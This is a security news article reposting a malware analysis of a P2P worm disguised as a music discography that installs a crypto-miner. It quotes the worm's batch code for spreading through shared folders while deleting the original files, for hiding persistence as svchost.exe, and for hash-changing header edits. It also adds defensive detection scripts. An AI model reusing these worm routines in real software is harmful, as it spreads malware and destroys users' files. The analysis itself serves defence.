Experts spotted P2P worm spreading Crypto-Miners in the wild

Malware researchers at Yoroi-Cybaze Z-Lab have discovered a P2P worm that is spreading Crypto-Miners in the wild.


In the past months we published a white paper exploring the risks that users face when downloading material from P2P sharing networks, such as the Torrent one. We discussed how crooks easily lure their victims into downloading malware along with the desired content. Recently, our threat monitoring operations pointed us to an interesting file named “Lucio Dalla Discografia Completa”: this file pretends to be the complete discography of a famous Italian singer, but it actually hides malicious intents.

For this reason, Cybaze-Yoroi ZLAB dissected this malware threat revealing its hidden virulent nature. 

Technical Analysis 

As anticipated, the file downloaded from the BitTorrent network is an executable. A quick recon revealed it actually is an SFX archive containing several other files. 

Hash: f9b2e61200addf760d7bd157c73201e97257b12d5177837a1bffb98f4064e76a
Threat: Miner-Dropper
Brief Description: Coin-miner dropper (SFX archive)
Ssdeep: 98304:BbEwGxyUOn/JaYYaeY+dM6YydmOQ1zYuuUBb53+munE0dMp1oHnXZetvRfuODYN
Table 1: Static Information about the miner dropper

The use of an SFX archive allows the attacker to hide the content of the malicious PE and significantly reduce the detection rate. Opening the sample with a common archive manager like WinRAR or 7z unveils its content.

Figure 1: Content of the SFX file

The archive contains more than a dozen files. In detail it embeds:

- 16 temporary files used during execution;
- a Visual Basic Script;
- a batch script;
- and a setup file.

On the right of Figure 1 it is possible to see the SFX configuration file. After the auto-extraction, the first file run is “run.vbs”. Its content is minimal and quickly redirects execution to a small batch file, “installer.bat”, contained in the same folder: it runs installer.bat (the filename) with the parameters “0” (WindowStyle hidden, to avoid visible windows that may trigger antivirus heuristics) and “true” (WaitOnReturn).

The content of the “installer.bat” file is also minimal and points to a more complex text file, “007.tmp”, later renamed “007.bat”. That file weighs over 59 KB and contains more interesting functionalities.

Unlike the previous script, the “007” file performs many operations. The first one is to copy all files contained in the extraction directory into a “#” subdirectory and to rename some of the just-extracted files, suggesting that some of them are dependencies of a more complex chain.

@echo off & setlocal enabledelayedexpansion
set CURRDIR=%~dp0
md #
copy "%CURRDIR%/002.tmp" "%CURRDIR%/#/002.tmp"
copy "%CURRDIR%/003.tmp" "%CURRDIR%/#/003.tmp"
copy "%CURRDIR%/004.tmp" "%CURRDIR%/#/004.tmp"
copy "%CURRDIR%/005.tmp" "%CURRDIR%/#/005.tmp"
copy "%CURRDIR%/006.tmp" "%CURRDIR%/#/006.tmp"
copy "%CURRDIR%/007.tmp" "%CURRDIR%/#/007.tmp"
copy "%CURRDIR%/008.tmp" "%CURRDIR%/#/008.tmp"
copy "%CURRDIR%/010.tmp" "%CURRDIR%/#/010.tmp"
copy "%CURRDIR%/011.tmp" "%CURRDIR%/#/011.tmp"
copy "%CURRDIR%/013.tmp" "%CURRDIR%/#/013.tmp"
copy "%CURRDIR%/014.tmp" "%CURRDIR%/#/014.tmp"
copy "%CURRDIR%/016.tmp" "%CURRDIR%/#/016.tmp"
copy "%CURRDIR%/installer.bat" "%CURRDIR%/#/installer.bat"
copy "%CURRDIR%/run.vbs" "%CURRDIR%/#/run.vbs"
copy "%CURRDIR%/002.tmp" "%CURRDIR%/7z.exe"
copy "%CURRDIR%/003.tmp" "%CURRDIR%/7z.dll"
copy "%CURRDIR%/004.tmp" "%CURRDIR%/Default.SFX"
copy "%CURRDIR%/005.tmp" "%CURRDIR%/Rar.exe"
copy "%CURRDIR%/006.tmp" "%CURRDIR%/sfx.conf"
Code Snippet 1: Copy of the files in a subfolder

After that, it generates three different files named “001.tmp”, “32.tmp” and “64.tmp”, later renamed with the “.exe” suffix. They are created by recombining the original files. In particular, “001.tmp” is created by combining the files “008.tmp”, “009.tmp” and “010.tmp”: the resulting executable had been split into those files to evade AV signatures.

But this reassembled executable hides another interesting detail. Before merging the file slices, the script replaces part of the PE header: it overwrites the “This program cannot be run in DOS mode” string with random characters, generating different file hashes at every infection. This polymorphic technique, implemented directly in the batch stage, is applied to all the other files chunked and embedded into the original SFX archive.
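The stub-overwriting trick described above only changes bytes in the DOS stub, the region between the 64-byte MZ header and the PE signature. Two defender-side checks follow from that: flag PE files whose stub no longer carries the standard linker message, and hash the file with the stub region zeroed so that drops that differ only in the randomized bytes cluster together. The following Python is an added example written for this article, not code from the analysed sample or from Yoroi; `build_sample` constructs a minimal MZ/PE-shaped buffer purely for demonstration, and the "random" stub contents are fixed constructed strings.

```python
import hashlib
import struct

# Standard DOS stub message written by the linker; the worm's batch stage
# overwrites it with random characters so every dropped PE gets a new hash.
DOS_STUB_MESSAGE = b"This program cannot be run in DOS mode."


def _e_lfanew(data: bytes) -> int:
    """Read the PE header offset from the MZ header and validate it."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew < 0x40 or e_lfanew + 4 > len(data):
        raise ValueError("e_lfanew out of range")
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found at e_lfanew")
    return e_lfanew


def dos_stub(data: bytes) -> bytes:
    """Return the stub region between the 64-byte MZ header and the PE signature."""
    return data[0x40:_e_lfanew(data)]


def stub_is_tampered(data: bytes) -> bool:
    """Flag a PE whose stub no longer carries the standard message."""
    return DOS_STUB_MESSAGE not in dos_stub(data)


def stub_insensitive_sha256(data: bytes) -> str:
    """SHA-256 with the stub region zeroed: variants that differ only in the
    randomized stub bytes (same stub length) collapse to one value, which is
    useful for clustering polymorphic drops of the same payload."""
    e_lfanew = _e_lfanew(data)
    normalized = data[:0x40] + b"\0" * (e_lfanew - 0x40) + data[e_lfanew:]
    return hashlib.sha256(normalized).hexdigest()


def build_sample(stub_message: bytes) -> bytes:
    """Constructed MZ/PE-shaped buffer for demonstration; it is not a real,
    runnable executable, only the header layout the checks above rely on."""
    stub = (b"\x0e\x1f\xba\x0e\x00\xb4\x09\xcd\x21\xb8\x01\x4c\xcd\x21"
            + stub_message + b"\r\r\n$\0")
    header = bytearray(b"MZ" + b"\0" * 0x3E)
    struct.pack_into("<I", header, 0x3C, 0x40 + len(stub))  # e_lfanew
    pe = b"PE\0\0" + b"\0" * 244 + b"constructed section data"
    return bytes(header) + stub + pe


def demo() -> dict:
    """Clean sample vs. two variants with constructed, same-length random stubs."""
    clean = build_sample(DOS_STUB_MESSAGE)
    variant_a = build_sample(b"k3Qz9Lm1Wv0" * 3 + b"ABCDEF")  # 39 bytes, constructed
    variant_b = build_sample(b"p8Rt2Xn5Yq7" * 3 + b"GHIJKL")  # 39 bytes, constructed
    return {
        "clean_tampered": stub_is_tampered(clean),
        "variant_tampered": stub_is_tampered(variant_a),
        "plain_hashes_differ": hashlib.sha256(variant_a).hexdigest()
        != hashlib.sha256(variant_b).hexdigest(),
        "normalized_hashes_match": stub_insensitive_sha256(variant_a)
        == stub_insensitive_sha256(variant_b),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The absence of the message is not proof of tampering on its own (some packers and hand-built binaries ship a custom stub), so treat it as one weak indicator to combine with others; the normalized hash, on the other hand, is what lets a SOC match the per-infection variants of this dropper against a single known-bad value.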

Figure 2: Generation of the custom DOS header

After that, the script uses the just-created “Rar.exe” and “7z.exe” to build new SFX files inside directories belonging to P2P platforms, i.e. the folders shared by the file-sharing clients installed on the victim machine. This trick is used to spread the attack across the file-sharing communities, to compromise many more victims and to keep the infection alive. An example of this routine is the following:

for /d /r "c:\" %%a in (preferences.ini) do (
  if exist "%%a" (
    for /f %%b in ('findstr /c:"IncomingDir=" "%%a"') do (
      set "var=%%b"
      for %%c in ("!var:~12!*.*") do (
        ECHO ERRO %random%%random%%random%%random%%random%%random%%random%%random%%random%%random% > "%CURRDIR%#\setup"
        rar a -r -sfx -m5 -ep1 -zsfx.conf "%%~nc".exe #\*
        7z a -tzip -mx=0 "%%~nc".zip "%%~nc".exe
        del "%%~nc".exe
        del "%%c"
        move "" "!var:~12!"
      )
    )
  )
)
[…]
for /d /r "c:\" %%a in (*) do (
  if /i "%%~nxa"=="my grokster" (
    set "var=%%a\"
    (for %%c in ("!var!*.*") do (
      ECHO ERRO %random%%random%%random%%random%%random%%random%%random%%random%%random%%random% > "%CURRDIR%#\setup"
      rar a -r -sfx -m5 -ep1 -zsfx.conf "%%~nc".exe #\*
      7z a -tzip -mx=0 "%%~nc".zip "%%~nc".exe
      del "%%~nc".exe
      del "%%c"
      move "" "!var!"
    ))
  )
)
Code Snippet 2: Example of propagation routine
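The propagation routine leaves a recognizable artifact: for every file in a shared folder it produces a `<title>.zip` that contains nothing but a `<title>.exe` SFX, stored without compression. A defender can hunt for exactly that shape in the incoming/shared directories of P2P clients. The following Python is an added example written for this article, not code from the sample or from Yoroi: `parse_incoming_dir` reads the same `IncomingDir=` key the batch code greps for, `scan_share_folder` flags archives that wrap a single executable named after the archive, and `build_demo_share` constructs a throwaway folder with one worm-style and two benign archives so the scan runs offline.

```python
import tempfile
import zipfile
from pathlib import Path
from typing import List, Optional

# Extensions that count as executables inside the wrapper archive.
EXECUTABLE_SUFFIXES = {".exe", ".scr", ".com", ".bat", ".vbs"}


def parse_incoming_dir(preferences_ini: str) -> Optional[str]:
    """Extract the IncomingDir= value from a client preferences file, the same
    key the batch routine reads with findstr to locate the shared folder."""
    for line in preferences_ini.splitlines():
        if line.startswith("IncomingDir="):
            return line[len("IncomingDir="):].strip()
    return None


def zip_wraps_single_executable(zip_path: Path) -> bool:
    """True when the archive holds exactly one file and it is an executable whose
    base name matches the archive name ('<title>.zip' around '<title>.exe')."""
    try:
        with zipfile.ZipFile(zip_path) as zf:
            members = [info for info in zf.infolist() if not info.is_dir()]
    except zipfile.BadZipFile:
        return False
    if len(members) != 1:
        return False
    member = Path(members[0].filename)
    return (member.suffix.lower() in EXECUTABLE_SUFFIXES
            and member.stem.lower() == zip_path.stem.lower())


def scan_share_folder(folder: Path) -> List[Path]:
    """Return every archive under the shared folder matching the worm's pattern."""
    return sorted(p for p in folder.rglob("*.zip") if zip_wraps_single_executable(p))


def build_demo_share(root: Path) -> Path:
    """Constructed sample share: one worm-style archive and two benign ones."""
    share = root / "Incoming"
    share.mkdir(parents=True, exist_ok=True)
    with zipfile.ZipFile(share / "Lucio Dalla Discografia Completa.zip", "w") as zf:
        zf.writestr("Lucio Dalla Discografia Completa.exe", b"MZ constructed placeholder")
    with zipfile.ZipFile(share / "holiday_photos.zip", "w") as zf:
        zf.writestr("img001.jpg", b"\xff\xd8 constructed")
        zf.writestr("img002.jpg", b"\xff\xd8 constructed")
    with zipfile.ZipFile(share / "tool_readme.zip", "w") as zf:
        zf.writestr("README.txt", b"constructed text")
    return share


def demo() -> List[str]:
    """Run the scan on the constructed share and return the flagged archive names."""
    with tempfile.TemporaryDirectory() as tmp:
        share = build_demo_share(Path(tmp))
        return [p.name for p in scan_share_folder(share)]


if __name__ == "__main__":
    print(parse_incoming_dir("[Client]\nIncomingDir=C:\\Shared\\Incoming\n"))
    for name in demo():
        print("suspicious archive:", name)
```

On a real host, feed `scan_share_folder` the directory returned by `parse_incoming_dir` (and any other client share folders); a match is worth quarantining and checking against the stub-normalized hash of the known dropper, since the per-infection SFX will not match the plain hashes in the tables above.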

All these actions are performed for each system drive letter, such as C:, D:, X: and so on. After that, the script checks the Microsoft Windows OS version, from “5.x” to “15.x”, and finally executes several version-specific routines according to the target machine. These routines perform a few basic operations:

- create a new directory in “%systemdrive%\AppCache\x86” and immediately hide it;
- copy the file “001.tmp” into the Startup folder (for every OS language), renaming it “svchost.exe”, and the file 32/64.tmp into “AppCache\x86”;
- execute the “001.exe” file.

:win7
if defined PROGRAMFILES(X86) (goto x64) else (goto x86)
:x64
mkdir %systemdrive%\AppCache\x86
attrib +s +h %systemdrive%\AppCache\x86
attrib +s +h %systemdrive%\AppCache
copy /y "%CURRDIR%01.tmp" "%AppData%\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe"
copy /y "%CURRDIR%01.tmp" "%systemdrive%\users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exe"
[…]
copy /y "%CURRDIR%64.tmp" "%systemdrive%\AppCache\x86\svchost.exe"
attrib +h "%systemdrive%\AppCache\x86\svchost.exe"
"%AppData%\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe"
"%systemdrive%\users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exe"
[…]
goto end
Code Snippet 3: Choice of the files to copy depending on whether the target architecture is x86 or x64

At this point, the malicious control passes to the 001.exe file located in the Startup folder.

Figure 3: UPX signature evidence

The 001 File

The 001.exe is packed with a known version of the UPX compressor, so the extraction of the payload is quite straightforward.

Hash: b6080b2786d2e4ac30207fb2f177046cfd40fa6578c56f3dfd13abab7d62e2ea
Threat: Miner Launcher
Brief Description: Coin-miner Payload (001.exe) packed with UPX
Ssdeep: 3072:A3VD85gJFV8QncMujKCv0jqAi0hIazLEHYxWVfhn+zM45uUyvHBsV2svkgfODQ2C
Table 2: Generic info about the Miner Loader

Hash: 7bd25bd3c0f003ffea67c846b4fefd8fb8b4f72d836544d0ef786c5c6c63b422
Threat: Miner Launcher Decompressed
Brief Description: Coin-miner Payload (001.exe) unpacked
Ssdeep: 12288:7EyxWjS8ZZVajy6YWgHQ+oHxlJz4UE0UsZ+GmYNuuv:oyxWjS8ZZVUYWgw1Hh
Table 3: Generic info about the Miner Loader unpacked

Analyzing the decompressed binary, we noticed that the malware first tries to run the “svchost.exe” binary contained in “%systemdrive%\AppCache\x86”, which is likely the real payload.

Figure 4: Evidence of the mining routine

The Payload

Hash: 73bc41504045e4e6de1b63ec40433afabf316141b1289c69905ee946e1b1a263
Threat: Miner-Payload
Brief Description: Coin-miner Payload (32.exe) packed with UPX (minerd)
Ssdeep: 73bc41504045e4e6de1b63ec40433afabf316141b1289c69905ee946e1b1a263
Table 4: Generic Information of the Coin-miner compiled in 32 bit (UPX packed)

Hash: a3574e73234e18be8d233c9e3fa3819600fc40341d8be8fc4449e4e73632ad6d
Threat: Miner-Payload
Brief Description: Coin-miner Payload (64.exe) packed with UPX (minerd)
Ssdeep: 49152:sb5CY+muocuUwlCdMsQd1pSHn/5JKIezmMNkG7403EIlnDysnue759ByzPIYNUN
Table 5: Generic Information of the Coin-miner compiled in 32 bit (UPX unpacked)

The “svchost.exe” placed in the “%systemdrive%\AppCache\x86” folder is actually one of the two files, “32.exe” or “64.exe”, previously created. After unpacking them, the results are the following.

Hash: 746d17e8d0b961f0c7733f155152fa54d2610fc6d117217d24f32d3ad370075e
Threat: Miner-Payload
Brief Description: Coin-miner Payload (32.exe) unpacked (minerd)
Ssdeep: 196608:aN8/juE4Be73AeWNEwVGuhcf7eVhbjYV:tuwUbK
Table 6: Generic Information of the Coin-miner compiled in 64 bit (UPX packed)

Hash: 552a4cbd2628d16d1fc910c9fc24bc426cafdf0f755f7b4013484adbc0393ca7
Threat: Miner-Payload
Brief Description: Coin-miner Payload (64.exe) unpacked (minerd)
Ssdeep: 393216:6ovgtbTTTpT1TITHThTtTwTaTtTVTFTZTlTNTbTwTuTzT1T0TtTlT1ToTlTzTVTz:6
Table 7: Generic Information of the Coin-miner compiled in 64 bit (UPX packed)

Obviously, these hashes change at every infection due to the polymorphic technique implemented in the batch stage described above. The only purpose of “001.exe” is to execute the “32.exe” or “64.exe” file contained in “%systemdrive%\AppCache\x86”, a Stratum-based coin miner. Stratum is the de-facto standard protocol used by crypto-miners to connect to mining pools.
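Because the miner talks Stratum, the pool connection is the most stable network indicator of this campaign: the dropped binaries change hash on every infection, but the JSON-RPC `mining.subscribe`/`mining.authorize` (or `login`) exchange, and the pool account it carries, do not. The following Python is an added example written for this article, not code from the sample or from Yoroi. It classifies captured TCP payload lines as Stratum requests and pulls out the wallet/worker identity and miner agent string; `SAMPLE_STREAM` is a constructed capture with placeholder values, not traffic from the analysed miner.

```python
import json
from typing import Dict, List, Optional

# Method names from the Stratum mining protocol (classic "mining.*" flavour) and
# the JSON-RPC "login"/"submit" flavour used by several CPU miners.
STRATUM_METHODS = {
    "mining.subscribe", "mining.authorize", "mining.submit",
    "mining.notify", "mining.set_difficulty",
    "login", "submit", "getjob",
}


def parse_stratum_message(line: str) -> Optional[Dict]:
    """Return a normalized record when the line is a Stratum JSON-RPC request."""
    line = line.strip()
    if not line.startswith("{"):
        return None
    try:
        msg = json.loads(line)
    except json.JSONDecodeError:
        return None
    if not isinstance(msg, dict) or msg.get("method") not in STRATUM_METHODS:
        return None
    return {"method": msg["method"], "params": msg.get("params")}


def extract_identity(record: Dict) -> Optional[str]:
    """Pull the pool account (wallet/worker) that identifies the campaign."""
    params = record.get("params")
    if record["method"] == "mining.authorize" and isinstance(params, list) and params:
        return str(params[0])
    if record["method"] == "login" and isinstance(params, dict):
        return params.get("login")
    return None


def summarize_stream(lines: List[str]) -> Dict:
    """Aggregate a captured TCP payload (one message per line) into alert fields."""
    methods: List[str] = []
    identities, agents = set(), set()
    for line in lines:
        rec = parse_stratum_message(line)
        if rec is None:
            continue
        methods.append(rec["method"])
        ident = extract_identity(rec)
        if ident:
            identities.add(ident)
        params = rec["params"]
        if rec["method"] == "mining.subscribe" and isinstance(params, list) and params:
            agents.add(str(params[0]))  # subscribe carries the miner's user agent
        elif rec["method"] == "login" and isinstance(params, dict) and params.get("agent"):
            agents.add(params["agent"])
    return {
        "is_stratum": bool(methods),
        "methods": methods,
        "identities": sorted(identities),
        "agents": sorted(agents),
    }


# Constructed sample capture (not from the analysed sample): a cpuminer-style
# subscribe/authorize/submit exchange plus a "login"-style request and one
# unrelated HTTP line, to show that non-JSON traffic is ignored.
SAMPLE_STREAM = [
    '{"id": 1, "method": "mining.subscribe", "params": ["cpuminer/2.5.0"]}',
    '{"id": 1, "result": [["mining.notify", "deadbeef"], "00000000", 4], "error": null}',
    '{"id": 2, "method": "mining.authorize", "params": ["WALLET_PLACEHOLDER.worker01", "x"]}',
    'GET /index.html HTTP/1.1',
    '{"id": 3, "method": "mining.submit", "params": ["WALLET_PLACEHOLDER.worker01", "job1", "00000000", "5c9f1a2b", "1a2b3c4d"]}',
    '{"jsonrpc": "2.0", "id": 4, "method": "login", "params": {"login": "WALLET_PLACEHOLDER", "pass": "x", "agent": "constructed-agent/1.0"}}',
]

if __name__ == "__main__":
    print(json.dumps(summarize_stream(SAMPLE_STREAM), indent=2))
```

In practice the lines come from a proxy or IDS stream reassembly; the extracted identity is the value to pivot on, since every infected host in the campaign mines into the same pool account regardless of which polymorphic variant it received.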

Figure 5: Connection routine to the mining server

Exploring the sample, we notice that it actually is “MinerD”, an open-source cryptomining software publicly available on GitHub.

Figure 6: Comparison between the payload (on the left) and the GitHub project (on the right)

Conclusion

This malware threat reminds us of the hidden risks of downloading material through P2P networks, along with the tricks adopted by crooks to keep the campaign running in the wild. Indeed, this sample is able to survive across multiple P2P networks by propagating to the P2P shared folders configured on the victim machine, ensuring a good level of resilience from the attacker's point of view. Also, the attackers implemented a polymorphic trick directly in batch language, replacing part of the PE file header to create unique samples on each infection.

A naive or distracted user can be lured into downloading infected media content with the promise of hearing their favorite musician, but this action can compromise the victim's machine and feed the cyber-criminals behind this campaign. This time the consequences of such a lack of awareness are quite contained: the final payload is a crypto-miner, and the user may only experience slowdowns or crashes. But what if the payload were a bot, a RAT, or even ransomware? The consequences could be far more serious.

Technical details, including IoCs and Yara Rules, are available in the analysis published in the Yoroi blog.


Pierluigi Paganini

(SecurityAffairs – crypto-miners, P2P worm)

The post Experts spotted P2P worm spreading Crypto-Miners in the wild appeared first on Security Affairs.